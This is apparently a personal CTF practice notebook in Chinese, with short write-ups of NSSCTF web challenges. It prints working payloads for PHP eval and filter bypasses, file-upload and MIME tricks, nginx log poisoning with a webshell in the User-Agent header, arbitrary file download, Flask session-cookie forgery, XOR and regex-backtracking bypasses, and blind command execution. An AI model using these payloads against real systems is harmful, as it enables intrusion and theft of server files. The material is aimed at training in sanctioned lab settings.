nss刷题3

[SWPUCTF 2022 新生赛]webdog1__start

level1：

打开环境后什么也，没有，查看源码，看到第一关是MD5值，要get传参web，然后web的值的MD5和它原来值相等，0e开头的字符在php中都是0，传入一个0e开头的值即可

payload：?web=0e215962017

level2:

打开·打开页面后什么也没有，抓包发现hint，访问f14g.php

上面说不相信flag确实在这里，，查看源代码也没有什么

继续抓包，发现新的hint

level3

访问新的页面，得到一串代码


<?php
error_reporting(0);highlight_file(__FILE__);if (isset($_GET['get'])){$get=$_GET['get'];if(!strstr($get," ")){$get = str_ireplace("flag", " ", $get); //过滤了flag和空格if (strlen($get)>18){      //限制传参的字符长度最大为18die("This is too long.");}else{eval($get);} }else {die("nonono"); }}?

可以转接一下参数，就可以绕过长度限制

payload:?get=eval($_GET[1]);&1=system('tac f*');

得到上面说flag包含在/flag文件里面，得到flag

[MoeCTF 2022]what are y0u uploading？

打开环境，是文件上传，先随便上传一个文件看看，上面说只允许上传jpe,gif,png

那就不考虑.htaccess类型的，因为虽然可以传图片，但是不可以上传配置文件，因此图片马是不会被解析的，尝试修改文件类型(MIME)，上传成功，根据题目提示，修改

得到flag

[GKCTF 2021]easycms

打开环境后是一个网站，题目的提示说是真的cms，后台扫描一下，有一个admin.php

弱口令，admin和12345或者damin/admin和demo/demo

登录进去以后就是后台的admin权限

然后里面有一个设计主题，也就是你可以在里面设计自己网站,右上角有自己可以导出的按钮

随便填完以后就可以导出文件，复制文件链接，然后可以看到后面有一串base的字符,解码后就就能到文件下载的路径，然后可以看到这个路径是从/var一直往下面的

base64解码

我们既然得到了下载文件的完整链接，那是不是意味着我们可以下载任意我们知道名字的文件，尝试一下，将原本的文件路径改为/flag，即node7.anna.nssctf.cn:23981/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=，然后访问，下载了一个文件,将它的后缀改为txt，可以得到文件内容

小结一下：level1:这道题我们先是发现了有后台网页;即index.php,level2:然后通过弱口令登录，拿到了后台的admin权限;level3:然后又在设计中发现他的主题下载的时候会有完整的文件下载路径;level4:然后猜测有可能存在任意文件读取，然后得到的我们想要的文件。

总得来说，这个cms的后台登录是弱口令，还有任意文件下载的漏洞。

[SWPUCTF 2022 新生赛]funny_php

打开就是，直接来吧

<?phpsession_start();highlight_file(__FILE__);if(isset($_GET['num'])){if(strlen($_GET['num'])<=3&&$_GET['num']>999999999){ echo ":D";$_SESSION['L1'] = 1;}else{echo ":C";}}if(isset($_GET['str'])){$str = preg_replace('/NSSCTF/',"",$_GET['str']);if($str === "NSSCTF"){echo "wow";$_SESSION['L2'] = 1;}else{echo $str;}}if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){if($_POST['md5_1']!==$_POST['md5_2']&&md5($_POST['md5_1'])==md5($_POST['md5_2'])){echo "Nice!";if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){if(is_string($_POST['md5_1'])&&is_string($_POST['md5_2'])){echo "yoxi!";$_SESSION['L3'] = 1;}else{echo "X(";}}}else{echo "G";echo $_POST['md5_1']."\n".$_POST['md5_2'];}}if(isset($_SESSION['L1'])&&isset($_SESSION['L2'])&&isset($_SESSION['L3'])){include('flag.php');echo $flag;}?>

level1:要求我们get传参num，要求这个字符串的长度<3&>999999999,前面的意思是只有三个字符，但是它由于科学计数法实际上这个数是9*10的9次方，绕过

if(isset($_GET['num'])){if(strlen($_GET['num'])<=3&&$_GET['num']>999999999){ echo ":D";$_SESSION['L1'] = 1;}else{echo ":C";}}

level2: 上面要求get传参str。内容为NSSCTF，但是这里的正则匹配又会将NSSCTF过滤掉，换为空，可以双写绕过，即str=NSSNSSCTFCTF,绕过,无所谓顺序，但是不能是NSSCTFNSSCTF，要不在一起才可以，是完整的NSSCTF两遍就可以

if(isset($_GET['str'])){$str = preg_replace('/NSSCTF/',"",$_GET['str']);if($str === "NSSCTF"){echo "wow";$_SESSION['L2'] = 1;}else{echo $str;}}

level3: 要求是md5_1和md5_2的字符不同，但是MD5值相等，找两个就可以有很多

payload：

md5_1=s878926199a&md5_2=s155964671a

if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){if($_POST['md5_1']!==$_POST['md5_2']&&md5($_POST['md5_1'])==md5($_POST['md5_2'])){echo "Nice!";if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){if(is_string($_POST['md5_1'])&&is_string($_POST['md5_2'])){echo "yoxi!";$_SESSION['L3'] = 1;}else{echo "X(";}}}else{echo "G";echo $_POST['md5_1']."\n".$_POST['md5_2'];}}

[MoeCTF 2021]2048

打开后是个游戏，先乱玩一下，方便找关键信息

源代码找一下

改大一点 ,有两种方法，第一种，修改分数为>50000的值，然后玩游戏让它自己结束，第二种，直接传参，让分数大于50000,。

[NSSRound#1 Basic]basic_check

打开环境个源代码什么也没有，扫描一下，dirsearch扫不出来，用nikto扫描可以知道可以用PUT协议

上传成功，访问

[LitCTF 2023]Flag点击就送！

题目描述

大型Flag赠送活动开始啦，不过只有管理员才能拿到

打开环境是一个验证框，问我们的名字，祟拜输入一个名字

告诉我们只有管理员才能拿flag

可以在cookie离开看到有session

解密一下是：上面说name=1

可以伪造一下

脚本如下：

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3:  # < 3.0raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4from abc import ABCMeta, abstractmethod
else:  # > 3.4from abc import ABC, abstractmethod# Lib for argument parsing
import argparse# external Imports
from flask.sessions import SecureCookieSessionInterfaceclass MockApp(object):def __init__(self, secret_key):self.secret_key = secret_keyif sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4class FSCM(metaclass=ABCMeta):def encode(secret_key, session_cookie_structure):""" Encode a Flask session cookie """try:app = MockApp(secret_key)session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.dumps(session_cookie_structure)except Exception as e:return "[Encoding error] {}".format(e)raise edef decode(session_cookie_value, secret_key=None):""" Decode a Flask cookie  """try:if (secret_key == None):compressed = Falsepayload = session_cookie_valueif payload.startswith('.'):compressed = Truepayload = payload[1:]data = payload.split(".")[0]data = base64_decode(data)if compressed:data = zlib.decompress(data)return dataelse:app = MockApp(secret_key)si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.loads(session_cookie_value)except Exception as e:return "[Decoding error] {}".format(e)raise e
else:  # > 3.4class FSCM(ABC):def encode(secret_key, session_cookie_structure):""" Encode a Flask session cookie """try:app = MockApp(secret_key)session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.dumps(session_cookie_structure)except Exception as e:return "[Encoding error] {}".format(e)raise edef decode(session_cookie_value, secret_key=None):""" Decode a Flask cookie  """try:if (secret_key == None):compressed = Falsepayload = session_cookie_valueif payload.startswith('.'):compressed = Truepayload = payload[1:]data = payload.split(".")[0]data = base64_decode(data)if compressed:data = zlib.decompress(data)return dataelse:app = MockApp(secret_key)si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.loads(session_cookie_value)except Exception as e:return "[Decoding error] {}".format(e)raise eif __name__ == "__main__":# Args are only relevant for __main__ usage## Description for helpparser = argparse.ArgumentParser(description='Flask Session Cookie Decoder/Encoder',epilog="Author : Wilson Sumanang, Alexandre ZANNI")## prepare sub commandssubparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')## create the parser for the encode commandparser_encode = subparsers.add_parser('encode', help='encode')parser_encode.add_argument('-s', '--secret-key', metavar='<string>',help='Secret key', required=True)parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',help='Session cookie structure', required=True)## create the parser for the decode commandparser_decode = subparsers.add_parser('decode', help='decode')parser_decode.add_argument('-s', '--secret-key', metavar='<string>',help='Secret key', required=False)parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',help='Session cookie value', required=True)## get argsargs = parser.parse_args()## find the option chosenif (args.subcommand == 'encode'):if (args.secret_key is not None and args.cookie_structure is not None):print(FSCM.encode(args.secret_key, args.cookie_structure))elif (args.subcommand == 'decode'):if (args.secret_key is not None and args.cookie_value is not None):print(FSCM.decode(args.cookie_value, args.secret_key))elif (args.cookie_value is not None):print(FSCM.decode(args.cookie_value))

使用：中间的密钥不知道，是猜的，其他题目可以看题目处理

解密：python flask_session_cookie_manager3.py decode -s "LitCTF" -c "eyJuYW1lIjoiMSJ9.Zh966A.NxRd8ILBNVdX5EZWUDtMS0J7vrQ"
加密：python flask_session_cookie_manager3.py encode -s "LitCTF" -t '{"name":"admin"}'

hackbar传一下，将原来的session改为我们想要的name改为admin即可

[HNCTF 2022 WEEK2]easy_include

打开环境，上面过滤了很多字符

<?php
//WEB手要懂得搜索if(isset($_GET['file'])){$file = $_GET['file'];if(preg_match("/php|flag|data|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=/i", $file)){die("error");}include($file);
}else{highlight_file(__FILE__);

可以看到服务器使用的是ngnix，先尝试一下看看有没有日志包含的漏洞

这个有个默认的日志路径是?file=/var/log/nginx/access.log，访问一下

然后抓包进行UA头注入 <?php system('ls /');?>

看到有一个类似flag的，抓一下<?php system('cat /ffflllaaaggg');?> ,得到flag

[SWPUCTF 2022 新生赛]funny_web

打开页面是一个登录框，上面说登录名是实验室名，不知道是啥，看一眼源码，有一个php页面

上面是主页的源码，

社工的题，不深究了

账号NSS
密码2122693401,intval()函数，后面加小数点和字母就可以

<?php
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
highlight_file(__FILE__);
include('flag.php');
if (isset($_GET['num'])) {$num = $_GET['num'];if ($num != '12345') {if (intval($num) == '12345') {echo $FLAG;}} else {echo "这为何相等又不相等";}
}

[NSSRound#8 Basic]MyDoor

打开环境，可以看到url栏上面有一个file=，尝试读取主页面

伪协议读取源码

解码一下，上面的代码的逻辑是get传参N_S.S会执行eval函数，get传参file，要求url的头是/index.php?file=，正则匹配，给出允许的文件名

<?php
error_reporting(0);if (isset($_GET['N_S.S'])) {eval($_GET['N_S.S']);
}if(!isset($_GET['file'])) {header('Location:/index.php?file=');
} else {$file = $_GET['file'];if (!preg_match('/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {include $file;} else {die('error.');}
}

也就是说，要同时满足两个要求，一个是开头的文件名是file，然后就是要用N_S.S来执行命令，但是在rul传参的时候，要1修改一下变为N[S.S，不然后面的.就会变成_，payload：/index.php?file=1&N[S.S=system(‘env’);，已经看了目录了，没有东西，一般这种情况下就是在环境变量里面了

[HUBUCTF 2022 新生赛]HowToGetShell(异或)

看一眼源码，

<?php
show_source(__FILE__);
$mess=$_POST['mess'];
if(preg_match("/[a-zA-Z]/",$mess)){die("invalid input!");
}
eval($mess);

有两种方法，但是都是异或

第一种就是直接用异或拼接命令函数的字母和后面的():

脚本：

valid = "1234567890!@$%^*(){}[];\'\",.<>/?-=_`~ "answer = str(input("请输入进行异或构造的字符串："))tmp1, tmp2 = '', ''
for c in answer:for i in valid:for j in valid:if (ord(i) ^ ord(j) == ord(c)):tmp1 += itmp2 += jbreakelse:continuebreak
print(tmp1,tmp2)

payload:mess=$_="0302181"^"@[@[_^^";$_(); //在环境变量或者是根目录下有flag

可以看看原理：从一道CTF题目谈PHP中的命令执行-CSDN博客

第二种就是先用异或传一个get的木马再用get正常的rce

看链接：刷题笔记[HUBUCTF 2022 新生赛]web_[hubuctf 2022 新生赛]howtogetshell-CSDN博客

[MoeCTF 2022]ezphp(变量覆盖)

看看源码，这段代码的意思是要get和post都传参flag，但是两个flag都不能等于flag,但是可以只传其中的一个，保证其中含有flag，且

<?phphighlight_file('source.txt');
echo "<br><br>";$flag = 'xxxxxxxx';
$giveme = 'can can need flag!';
$getout = 'No! flag.Try again. Come on!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){   //假如传了，两个中都要有flagexit($giveme);
}if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ //要求；两个的值都不为flagexit($getout);
}foreach ($_POST as $key => $value) { //创建$flag=它的值$$key = $value;
}foreach ($_GET as $key => $value) {    //如果存在$flag=xxx，创建$xxx=它的值，前提是$xxx=存在$$key = $$value;
}echo 'the flag is : ' . $flag;?>

先学习一下这个控制结构

$array = ['a' => 1,'b' => 2,'c' => 3
];foreach ($array as $key => $value) {echo "Key: $key, Value: $value" . PHP_EOL;
}输出：
Key: a, Value: 1
Key: b, Value: 2
Key: c, Value: 3

两种方法：

第一种是：顺序不变，必须要先用另一个变量把flag的值储存起来，否则flag会被覆盖

payload：

?a=flag&flag=a

第二种：超全局变量，由于先判断POST 再判断GET。用POST_GET更改GET，使第二个语句不生效。

GET： ?flag=a
POST： _GET=b    //(不是flag就可以）

[MoeCTF 2021]Web安全入门指北—GET

最简单的get传参

[NISACTF 2022]middlerce (正则匹配回溯绕过)

看看代码

<?php
include "check.php";
if (isset($_REQUEST['letter'])){$txw4ever = $_REQUEST['letter'];   //检查 $_REQUEST 数组中是否存在键 letter，如果存在，将其值赋给变量 $txw4ever。if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){die("再加把油喔");    //正则表达式中的 \w 匹配字母、数字和下划线，其他字符如 ^、*、(、~、`、?、/、 、|、&、!、<、>、{、\x09（制表符）、\x0a（换行符）、[ 都被匹配。}else{$command = json_decode($txw4ever,true)['cmd'];    //json解码变量里面的内容checkdata($command);      //检查里面的数据@eval($command);           //执行里面的内容}  
}
else{highlight_file(__FILE__);
}
?>

这里有脚本

import requests
payload='{"cmd":"?><?= `tail /f*`?>","test":"' + "@"*(1000000) + '"}'
res = requests.post("http://node4.anna.nssctf.cn:28790/", data={"letter":payload})
print(res.text)

[UUCTF 2022 新生赛]ez_upload

文件上传的题目，先随便上传一个看看，php类型不被允许，图片类型可以，再加上apach在解析文件时，如果遇见非法的后缀，就会往左看，直到遇见合法的文件名，如下

[FSCTF 2023]细狗2.0

题目描述

行就是行，不行就是不行。RCE全不做是几个意思啊QAQ

打开后是一个输入框，还是rce，先试试ls

ls都不行，前面加个；闭合一下 ,给了两个，但是不像

看看根目录,应该是空格绕过,$IFS$9

貌似是flag，抓一下payload：tac$IFS$9/f*

得到flag

[SWPUCTF 2023 秋季新生赛]RCE-PLUS(无回显rce)

看看源码,过滤了很多，没事，关键的没有过滤，无回显就重写入

<?php
error_reporting(0);
highlight_file(__FILE__);
function strCheck($cmd)
{if(!preg_match("/\;|\&|\\$|\x09|\x26|more|less|head|sort|tail|sed|cut|awk|strings|od|php|ping|flag/i", $cmd)){return($cmd);}else{die("i hate this");      }
}
$cmd=$_GET['cmd'];
strCheck($cmd);
shell_exec($cmd);
?>

?cmd=ls | tee 1.txt

?cmd=ls / | tee 1.txt

?cmd=tac /f* | tee 1.txt

[MoeCTF 2021]Do you know HTTP

才来就叫我们更改请求方式，来吧

将get传参改为HS

修改xff

修改UA头

[CISCN 2019初赛]Love Math

看看源码

<?php
error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){show_source(__FILE__);
}else{//例子 c=20-1$content = $_GET['c'];if (strlen($content) >= 80) {die("太长了不会算");}$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];foreach ($blacklist as $blackitem) {if (preg_match('/' . $blackitem . '/m', $content)) {die("请不要输入奇奇怪怪的字符");}}//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  foreach ($used_funcs[0] as $func) {if (!in_array($func, $whitelist)) {die("请不要输入奇奇怪怪的函数");}}//帮你算出答案eval('echo '.$content.';');
}

暂缓

[FSCTF 2023]EZ_eval

看看源码，其他的是正常的，主要是它有一个?>会截断我的命令

<?phpif(isset($_GET['word'])){$word = $_GET['word'];if (preg_match("/cat|tac|tail|more|head|nl|flag|less| /", $word)){die("nonono.");}$word = str_replace("?", "", $word); //将？替换为空eval("?>". $word);
}else{highlight_file(__FILE__);
}

可以用php段标签绕过(有版本限制7.0以下)，这里可以用script标签

word=<script%09language="php">passthru("ta\c%09/f*");

[BJDCTF 2020]ZJCTF，不过如此